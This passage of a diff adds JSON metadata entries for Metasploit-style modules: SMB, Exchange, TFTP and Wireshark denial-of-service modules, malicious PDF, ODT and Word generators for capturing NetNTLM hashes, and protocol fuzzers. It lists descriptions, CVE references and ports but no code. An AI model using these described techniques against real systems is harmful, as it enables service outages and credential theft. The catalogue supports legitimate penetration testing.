This bug was\n independently discovered by CORE Security and ISS.", + "references": [ + "OSVDB-27644", + "MSB-MS06-063", + "CVE-2006-3942", + "BID-19215" + ], + "platform": "", + "arch": "", + "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], + "targets": null, + "mod_time": "2020-05-13 16:34:47 +0000", + "path": "/modules/auxiliary/dos/windows/smb/ms06_063_trans.rb", + "is_install_path": true, + "ref_name": "dos/windows/smb/ms06_063_trans", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/windows/smb/ms09_001_write": { + "name": "Microsoft SRV.SYS WriteAndX Invalid DataOffset", + "fullname": "auxiliary/dos/windows/smb/ms09_001_write", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "j.v.vallejo " + ], + "description": "This module exploits a denial of service vulnerability in the\n SRV.SYS driver of the Windows operating system.\n\n This module has been tested successfully against Windows Vista.", + "references": [ + "MSB-MS09-001", + "OSVDB-48153", + "CVE-2008-4114", + "BID-31179" + ], + "platform": "", + "arch": "", + "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], + "targets": null, + "mod_time": "2020-05-13 16:34:47 +0000", + "path": "/modules/auxiliary/dos/windows/smb/ms09_001_write.rb", + "is_install_path": true, + "ref_name": "dos/windows/smb/ms09_001_write", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/windows/smb/ms09_050_smb2_negotiate_pidhigh": { + "name": "Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference", + "fullname": "auxiliary/dos/windows/smb/ms09_050_smb2_negotiate_pidhigh", + 
"aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "Laurent Gaffie ", + "hdm " + ], + "description": "This module exploits an out of bounds function table dereference in the SMB\n request validation code of the SRV2.SYS driver included with Windows Vista, Windows 7\n release candidates (not RTM), and Windows 2008 Server prior to R2. Windows\tVista\n without SP1 does not seem affected by this flaw.", + "references": [ + "CVE-2009-3103", + "BID-36299", + "OSVDB-57799", + "MSB-MS09-050", + "URL-https://seclists.org/fulldisclosure/2009/Sep/39" + ], + "platform": "", + "arch": "", + "rport": 445, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/auxiliary/dos/windows/smb/ms09_050_smb2_negotiate_pidhigh.rb", + "is_install_path": true, + "ref_name": "dos/windows/smb/ms09_050_smb2_negotiate_pidhigh", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/windows/smb/ms09_050_smb2_session_logoff": { + "name": "Microsoft SRV2.SYS SMB2 Logoff Remote Kernel NULL Pointer Dereference", + "fullname": "auxiliary/dos/windows/smb/ms09_050_smb2_session_logoff", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "sf " + ], + "description": "This module triggers a NULL pointer dereference in the SRV2.SYS kernel driver when processing\n an SMB2 logoff request before a session has been correctly negotiated, resulting in a BSOD.\n Effecting Vista SP1/SP2 (And possibly Server 2008 SP1/SP2), the flaw was resolved with MS09-050.", + "references": [ + "CVE-2009-3103", + "OSVDB-57799", + "MSB-MS09-050" + ], + "platform": "", + "arch": "", + "rport": 445, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2017-07-24 06:26:21 +0000", + "path": 
"/modules/auxiliary/dos/windows/smb/ms09_050_smb2_session_logoff.rb", + "is_install_path": true, + "ref_name": "dos/windows/smb/ms09_050_smb2_session_logoff", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/windows/smb/ms10_006_negotiate_response_loop": { + "name": "Microsoft Windows 7 / Server 2008 R2 SMB Client Infinite Loop", + "fullname": "auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "Laurent Gaffie ", + "hdm " + ], + "description": "This module exploits a denial of service flaw in the Microsoft\n Windows SMB client on Windows 7 and Windows Server 2008 R2. To trigger\n this bug, run this module as a service and forces a vulnerable client\n to access the IP of this system as an SMB server. This can be accomplished\n by embedding a UNC path (\\HOST\\share\\something) into a web page if the\n target is using Internet Explorer, or a Word document otherwise.", + "references": [ + "CVE-2010-0017", + "OSVDB-62244", + "MSB-MS10-006", + "URL-http://g-laurent.blogspot.com/2009/11/windows-7-server-2008r2-remote-kernel.html" + ], + "platform": "", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2017-08-24 21:38:44 +0000", + "path": "/modules/auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop.rb", + "is_install_path": true, + "ref_name": "dos/windows/smb/ms10_006_negotiate_response_loop", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/windows/smb/ms10_054_queryfs_pool_overflow": { + "name": "Microsoft Windows SRV.SYS SrvSmbQueryFsInformation Pool Overflow DoS", + "fullname": 
"auxiliary/dos/windows/smb/ms10_054_queryfs_pool_overflow", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "Laurent Gaffie ", + "jduck " + ], + "description": "This module exploits a denial of service flaw in the Microsoft\n Windows SMB service on versions of Windows prior to the August 2010 Patch\n Tuesday. To trigger this bug, you must be able to access a share with\n at least read privileges. That generally means you will need authentication.\n However, if a system has a guest accessible share, you can trigger it\n without any authentication.", + "references": [ + "CVE-2010-2550", + "OSVDB-66974", + "MSB-MS10-054", + "URL-https://seclists.org/fulldisclosure/2010/Aug/122" + ], + "platform": "", + "arch": "", + "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], + "targets": null, + "mod_time": "2020-05-13 16:34:47 +0000", + "path": "/modules/auxiliary/dos/windows/smb/ms10_054_queryfs_pool_overflow.rb", + "is_install_path": true, + "ref_name": "dos/windows/smb/ms10_054_queryfs_pool_overflow", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/windows/smb/ms11_019_electbowser": { + "name": "Microsoft Windows Browser Pool DoS", + "fullname": "auxiliary/dos/windows/smb/ms11_019_electbowser", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "Cupidon-3005", + "jduck " + ], + "description": "This module exploits a denial of service flaw in the Microsoft\n Windows SMB service on versions of Windows Server 2003 that have been\n configured as a domain controller. 
By sending a specially crafted election\n request, an attacker can cause a pool overflow.\n\n The vulnerability appears to be due to an error handling a length value\n while calculating the amount of memory to copy to a buffer. When there are\n zero bytes left in the buffer, the length value is improperly decremented\n and an integer underflow occurs. The resulting value is used in several\n calculations and is then passed as the length value to an inline memcpy\n operation.\n\n Unfortunately, the length value appears to be fixed at -2 (0xfffffffe) and\n causes considerable damage to kernel heap memory. While theoretically possible,\n it does not appear to be trivial to turn this vulnerability into remote (or\n even local) code execution.", + "references": [ + "CVE-2011-0654", + "BID-46360", + "OSVDB-70881", + "MSB-MS11-019", + "EDB-16166", + "URL-https://seclists.org/fulldisclosure/2011/Feb/285" + ], + "platform": "", + "arch": "", + "rport": 138, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2024-01-07 15:02:53 +0000", + "path": "/modules/auxiliary/dos/windows/smb/ms11_019_electbowser.rb", + "is_install_path": true, + "ref_name": "dos/windows/smb/ms11_019_electbowser", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/windows/smb/rras_vls_null_deref": { + "name": "Microsoft RRAS InterfaceAdjustVLSPointers NULL Dereference", + "fullname": "auxiliary/dos/windows/smb/rras_vls_null_deref", + "aliases": [], + "rank": 300, + "disclosure_date": "2006-06-14", + "type": "auxiliary", + "author": [ + "hdm " + ], + "description": "This module triggers a NULL dereference in svchost.exe on\n all current versions of Windows that run the RRAS service. 
This\n service is only accessible without authentication on Windows XP\n SP1 (using the SRVSVC pipe).", + "references": [ + "OSVDB-64340" + ], + "platform": "", + "arch": "", + "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], + "targets": null, + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/auxiliary/dos/windows/smb/rras_vls_null_deref.rb", + "is_install_path": true, + "ref_name": "dos/windows/smb/rras_vls_null_deref", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [ + { + "name": "Attack", + "description": "Run Denial of Service" + } + ] + }, + "auxiliary_dos/windows/smb/vista_negotiate_stop": { + "name": "Microsoft Vista SP0 SMB Negotiate Protocol DoS", + "fullname": "auxiliary/dos/windows/smb/vista_negotiate_stop", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "hdm " + ], + "description": "This module exploits a flaw in Windows Vista that allows a remote\n unauthenticated attacker to disable the SMB service. 
This vulnerability\n was silently fixed in Microsoft Vista Service Pack 1.", + "references": [ + "OSVDB-64341" + ], + "platform": "", + "arch": "", + "rport": 445, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2017-07-24 06:26:21 +0000", + "path": "/modules/auxiliary/dos/windows/smb/vista_negotiate_stop.rb", + "is_install_path": true, + "ref_name": "dos/windows/smb/vista_negotiate_stop", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/windows/smtp/ms06_019_exchange": { + "name": "MS06-019 Exchange MODPROP Heap Overflow", + "fullname": "auxiliary/dos/windows/smtp/ms06_019_exchange", + "aliases": [], + "rank": 300, + "disclosure_date": "2004-11-12", + "type": "auxiliary", + "author": [ + "pusscat " + ], + "description": "This module triggers a heap overflow vulnerability in MS\n Exchange that occurs when multiple malformed MODPROP values\n occur in a VCAL request.", + "references": [ + "BID-17908", + "CVE-2006-0027", + "MSB-MS06-019" + ], + "platform": "", + "arch": "", + "rport": 25, + "autofilter_ports": [ + 25, + 465, + 587, + 2525, + 25025, + 25000 + ], + "autofilter_services": [ + "smtp", + "smtps" + ], + "targets": null, + "mod_time": "2024-01-07 15:02:53 +0000", + "path": "/modules/auxiliary/dos/windows/smtp/ms06_019_exchange.rb", + "is_install_path": true, + "ref_name": "dos/windows/smtp/ms06_019_exchange", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/windows/ssh/sysax_sshd_kexchange": { + "name": "Sysax Multi-Server 6.10 SSHD Key Exchange Denial of Service", + "fullname": "auxiliary/dos/windows/ssh/sysax_sshd_kexchange", + "aliases": [], + "rank": 300, + "disclosure_date": "2013-03-17", + "type": "auxiliary", + "author": [ + "Matt \"hostess\" Andreko " + ], + 
"description": "This module sends a specially-crafted SSH Key Exchange causing the service to\n crash.", + "references": [ + "OSVDB-92081", + "URL-https://www.mattandreko.com/2013/04/sysax-multi-server-610-ssh-dos.html" + ], + "platform": "", + "arch": "", + "rport": 22, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/auxiliary/dos/windows/ssh/sysax_sshd_kexchange.rb", + "is_install_path": true, + "ref_name": "dos/windows/ssh/sysax_sshd_kexchange", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/windows/tftp/pt360_write": { + "name": "PacketTrap TFTP Server 2.2.5459.0 DoS", + "fullname": "auxiliary/dos/windows/tftp/pt360_write", + "aliases": [], + "rank": 300, + "disclosure_date": "2008-10-29", + "type": "auxiliary", + "author": [ + "kris katterjohn " + ], + "description": "The PacketTrap TFTP server version 2.2.5459.0 can be\n brought down by sending a special write request.", + "references": [ + "CVE-2008-1311", + "OSVDB-42932", + "EDB-6863" + ], + "platform": "", + "arch": "", + "rport": 69, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/auxiliary/dos/windows/tftp/pt360_write.rb", + "is_install_path": true, + "ref_name": "dos/windows/tftp/pt360_write", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/windows/tftp/solarwinds": { + "name": "SolarWinds TFTP Server 10.4.0.10 Denial of Service", + "fullname": "auxiliary/dos/windows/tftp/solarwinds", + "aliases": [], + "rank": 300, + "disclosure_date": "2010-05-21", + "type": "auxiliary", + "author": [ + "Nullthreat" + ], + "description": "The SolarWinds TFTP server can be shut down by 
sending a 'netascii' read\n request with a specially crafted file name.", + "references": [ + "CVE-2010-2115", + "OSVDB-64845", + "EDB-12683" + ], + "platform": "", + "arch": "", + "rport": 69, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/auxiliary/dos/windows/tftp/solarwinds.rb", + "is_install_path": true, + "ref_name": "dos/windows/tftp/solarwinds", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/wireshark/capwap": { + "name": "Wireshark CAPWAP Dissector DoS", + "fullname": "auxiliary/dos/wireshark/capwap", + "aliases": [], + "rank": 300, + "disclosure_date": "2014-04-28", + "type": "auxiliary", + "author": [ + "Laurent Butti", + "j0sm1" + ], + "description": "This module injects a malformed UDP packet to crash Wireshark and TShark 1.8.0 to 1.8.7, as well\n as 1.6.0 to 1.6.15. 
The vulnerability exists in the CAPWAP dissector which fails to handle a\n packet correctly when an incorrect length is given.", + "references": [ + "CVE-2013-4074", + "OSVDB-94091", + "BID-60500" + ], + "platform": "", + "arch": "", + "rport": 5247, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/auxiliary/dos/wireshark/capwap.rb", + "is_install_path": true, + "ref_name": "dos/wireshark/capwap", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/wireshark/chunked": { + "name": "Wireshark chunked_encoding_dissector Function DOS", + "fullname": "auxiliary/dos/wireshark/chunked", + "aliases": [], + "rank": 300, + "disclosure_date": "2007-02-22", + "type": "auxiliary", + "author": [ + "Matteo Cantoni " + ], + "description": "Wireshark crash when dissecting an HTTP chunked response.\n Versions affected: 0.99.5 (Bug 1394)", + "references": [ + "CVE-2007-3389", + "OSVDB-37643", + "URL-https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=1394" + ], + "platform": "", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/auxiliary/dos/wireshark/chunked.rb", + "is_install_path": true, + "ref_name": "dos/wireshark/chunked", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/wireshark/cldap": { + "name": "Wireshark CLDAP Dissector DOS", + "fullname": "auxiliary/dos/wireshark/cldap", + "aliases": [], + "rank": 300, + "disclosure_date": "2011-03-01", + "type": "auxiliary", + "author": [ + "joernchen (Phenoelit)>" + ], + "description": "This module causes infinite recursion to occur within the\n CLDAP dissector by sending a specially 
crafted UDP packet.", + "references": [ + "CVE-2011-1140", + "OSVDB-71552", + "URL-https://www.wireshark.org/security/wnpa-sec-2011-04.html", + "URL-https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=5717" + ], + "platform": "", + "arch": "", + "rport": 389, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/auxiliary/dos/wireshark/cldap.rb", + "is_install_path": true, + "ref_name": "dos/wireshark/cldap", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/wireshark/ldap": { + "name": "Wireshark LDAP Dissector DOS", + "fullname": "auxiliary/dos/wireshark/ldap", + "aliases": [], + "rank": 300, + "disclosure_date": "2008-03-28", + "type": "auxiliary", + "author": [ + "MC " + ], + "description": "The LDAP dissector in Wireshark 0.99.2 through 0.99.8 allows remote attackers\n to cause a denial of service (application crash) via a malformed packet.", + "references": [ + "CVE-2008-1562", + "OSVDB-43840" + ], + "platform": "", + "arch": "", + "rport": 389, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2017-07-24 06:26:21 +0000", + "path": "/modules/auxiliary/dos/wireshark/ldap.rb", + "is_install_path": true, + "ref_name": "dos/wireshark/ldap", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_fileformat/badpdf": { + "name": "BADPDF Malicious PDF Creator", + "fullname": "auxiliary/fileformat/badpdf", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "Assaf Baharav", + "Yaron Fruchtmann", + "Ido Solomon", + "Richard Davy - secureyourit.co.uk" + ], + "description": "This module can either creates a blank PDF file which contains a UNC link which can be used\n 
to capture NetNTLM credentials, or if the PDFINJECT option is used it will inject the necessary\n code into an existing PDF document if possible.", + "references": [ + "CVE-2018-4993", + "URL-https://research.checkpoint.com/ntlm-credentials-theft-via-pdf-files/" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2024-01-07 15:02:53 +0000", + "path": "/modules/auxiliary/fileformat/badpdf.rb", + "is_install_path": true, + "ref_name": "fileformat/badpdf", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_fileformat/multidrop": { + "name": "Windows SMB Multi Dropper", + "fullname": "auxiliary/fileformat/multidrop", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "Richard Davy - secureyourit.co.uk", + "mubix ", + "asoto-r7", + "hyp3rlinx", + "bcoles " + ], + "description": "This module dependent on the given filename extension creates either\n a .lnk, .scf, .url, .xml, .library-ms, or desktop.ini file which includes\n a reference to the specified remote host, causing SMB connections to be\n initiated from any user that views the file.", + "references": [ + "URL-https://malicious.link/blog/2012/02/11/ms08_068-ms10_046-fun-until-2018", + "URL-https://malicious.link/post/2012/2012-02-19-developing-the-lnk-metasploit-post-module-with-mona/", + "URL-https://bohops.com/2018/08/04/capturing-netntlm-hashes-with-office-dot-xml-documents/", + "URL-https://web.archive.org/web/20190106181024/https://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-.LIBRARY-MS-FILETYPE-INFORMATION-DISCLOSURE.txt" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2025-05-02 01:28:52 +0000", + "path": 
"/modules/auxiliary/fileformat/multidrop.rb", + "is_install_path": true, + "ref_name": "fileformat/multidrop", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_fileformat/odt_badodt": { + "name": "LibreOffice 6.03 /Apache OpenOffice 4.1.5 Malicious ODT File Generator", + "fullname": "auxiliary/fileformat/odt_badodt", + "aliases": [], + "rank": 300, + "disclosure_date": "2018-05-01", + "type": "auxiliary", + "author": [ + "Richard Davy - secureyourit.co.uk" + ], + "description": "Generates a Malicious ODT File which can be used with auxiliary/server/capture/smb or similar to capture hashes.", + "references": [ + "CVE-2018-10583", + "URL-https://secureyourit.co.uk/wp/2018/05/01/creating-malicious-odt-files/" + ], + "platform": "", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2018-06-06 11:26:20 +0000", + "path": "/modules/auxiliary/fileformat/odt_badodt.rb", + "is_install_path": true, + "ref_name": "fileformat/odt_badodt", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_fileformat/word_unc_injector": { + "name": "Microsoft Word UNC Path Injector", + "fullname": "auxiliary/fileformat/word_unc_injector", + "aliases": [ + "auxiliary/docx/word_unc_injector" + ], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "SphaZ " + ], + "description": "This module modifies a .docx file that will, upon opening, submit stored\n netNTLM credentials to a remote host. It can also create an empty docx file. If\n emailed the receiver needs to put the document in editing mode before the remote\n server will be contacted. Preview and read-only mode do not work. 
Verified to work\n with Microsoft Word 2003, 2007, 2010, and 2013. In order to get the hashes the\n auxiliary/server/capture/smb module can be used.", + "references": [ + "URL-https://web.archive.org/web/20140527232608/http://jedicorp.com/?p=534" + ], + "platform": "", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2025-04-30 18:26:15 +0000", + "path": "/modules/auxiliary/fileformat/word_unc_injector.rb", + "is_install_path": true, + "ref_name": "fileformat/word_unc_injector", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_fuzzers/dns/dns_fuzzer": { + "name": "DNS and DNSSEC Fuzzer", + "fullname": "auxiliary/fuzzers/dns/dns_fuzzer", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "pello " + ], + "description": "This module will connect to a DNS server and perform DNS and\n DNSSEC protocol-level fuzzing. 
Note that this module may inadvertently\n crash the target server.", + "references": [], + "platform": "", + "arch": "", + "rport": 53, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2019-12-07 08:01:52 +0000", + "path": "/modules/auxiliary/fuzzers/dns/dns_fuzzer.rb", + "is_install_path": true, + "ref_name": "fuzzers/dns/dns_fuzzer", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_fuzzers/ftp/client_ftp": { + "name": "Simple FTP Client Fuzzer", + "fullname": "auxiliary/fuzzers/ftp/client_ftp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "corelanc0d3r " + ], + "description": "This module will serve an FTP server and perform FTP client interaction fuzzing", + "references": [ + "URL-http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/" + ], + "platform": "", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2017-07-24 06:26:21 +0000", + "path": "/modules/auxiliary/fuzzers/ftp/client_ftp.rb", + "is_install_path": true, + "ref_name": "fuzzers/ftp/client_ftp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_fuzzers/ftp/ftp_pre_post": { + "name": "Simple FTP Fuzzer", + "fullname": "auxiliary/fuzzers/ftp/ftp_pre_post", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "corelanc0d3r ", + "jduck " + ], + "description": "This module will connect to a FTP server and perform pre- and post-authentication fuzzing", + "references": [], + "platform": "", + "arch": "", + "rport": 21, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2019-03-05 03:38:51 +0000", + "path": 
"/modules/auxiliary/fuzzers/ftp/ftp_pre_post.rb", + "is_install_path": true, + "ref_name": "fuzzers/ftp/ftp_pre_post", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_fuzzers/http/http_form_field": { + "name": "HTTP Form Field Fuzzer", + "fullname": "auxiliary/fuzzers/http/http_form_field", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "corelanc0d3r", + "Paulino Calderon " + ], + "description": "This module will grab all fields from a form,\n and launch a series of POST actions, fuzzing the contents\n of the form fields. You can optionally fuzz headers too\n (option is enabled by default)", + "references": [ + "URL-http://www.corelan.be:8800/index.php/2010/11/12/metasploit-module-http-form-field-fuzzer" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2024-01-07 15:02:53 +0000", + "path": "/modules/auxiliary/fuzzers/http/http_form_field.rb", + "is_install_path": true, + "ref_name": "fuzzers/http/http_form_field", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_fuzzers/http/http_get_uri_long": { + "name": "HTTP GET Request URI Fuzzer (Incrementing Lengths)", + "fullname": "auxiliary/fuzzers/http/http_get_uri_long", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "nullthreat" + ], + "description": "This module sends a series of HTTP GET request with incrementing URL lengths.", + "references": [], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2017-07-24 
06:26:21 +0000", + "path": "/modules/auxiliary/fuzzers/http/http_get_uri_long.rb", + "is_install_path": true, + "ref_name": "fuzzers/http/http_get_uri_long", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_fuzzers/http/http_get_uri_strings": { + "name": "HTTP GET Request URI Fuzzer (Fuzzer Strings)", + "fullname": "auxiliary/fuzzers/http/http_get_uri_strings", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "nullthreat" + ], + "description": "This module sends a series of HTTP GET request with malicious URIs.", + "references": [], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2017-07-24 06:26:21 +0000", + "path": "/modules/auxiliary/fuzzers/http/http_get_uri_strings.rb", + "is_install_path": true, + "ref_name": "fuzzers/http/http_get_uri_strings", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_fuzzers/ntp/ntp_protocol_fuzzer": { + "name": "NTP Protocol Fuzzer", + "fullname": "auxiliary/fuzzers/ntp/ntp_protocol_fuzzer", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "Jon Hart " + ], + "description": "A simplistic fuzzer for the Network Time Protocol that sends the\n following probes to understand NTP and look for anomalous NTP behavior:\n\n * All possible combinations of NTP versions and modes, even if not\n allowed or specified in the RFCs\n * Short versions of the above\n * Short, invalid datagrams\n * Full-size, random datagrams\n * All possible NTP control messages\n * All possible NTP private messages\n\n This findings of this fuzzer are not necessarily indicative of bugs,\n let alone vulnerabilities, rather they point out 
interesting things\n that might deserve more attention. Furthermore, this module is not\n particularly intelligent and there are many more areas of NTP that\n could be explored, including:\n\n * Warn if the response is 100% identical to the request\n * Warn if the \"mode\" (if applicable) doesn't align with what we expect,\n * Filter out the 12-byte mode 6 unsupported opcode errors.\n * Fuzz the control message payload offset/size/etc. There be bugs", + "references": [], + "platform": "", + "arch": "", + "rport": 123, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2021-04-06 14:45:11 +0000", + "path": "/modules/auxiliary/fuzzers/ntp/ntp_protocol_fuzzer.rb", + "is_install_path": true, + "ref_name": "fuzzers/ntp/ntp_protocol_fuzzer", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_fuzzers/smb/smb2_negotiate_corrupt": { + "name": "SMB Negotiate SMB2 Dialect Corruption", + "fullname": "auxiliary/fuzzers/smb/smb2_negotiate_corrupt", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "hdm " + ], + "description": "This module sends a series of SMB negotiate requests that advertise a\n SMB2 dialect with corrupted bytes.", + "references": [], + "platform": "", + "arch": "", + "rport": 445, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2017-08-24 21:38:44 +0000", + "path": "/modules/auxiliary/fuzzers/smb/smb2_negotiate_corrupt.rb", + "is_install_path": true, + "ref_name": "fuzzers/smb/smb2_negotiate_corrupt", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_fuzzers/smb/smb_create_pipe": { + "name": "SMB Create Pipe Request Fuzzer", + "fullname": "auxiliary/fuzzers/smb/smb_create_pipe", + "aliases": [], 
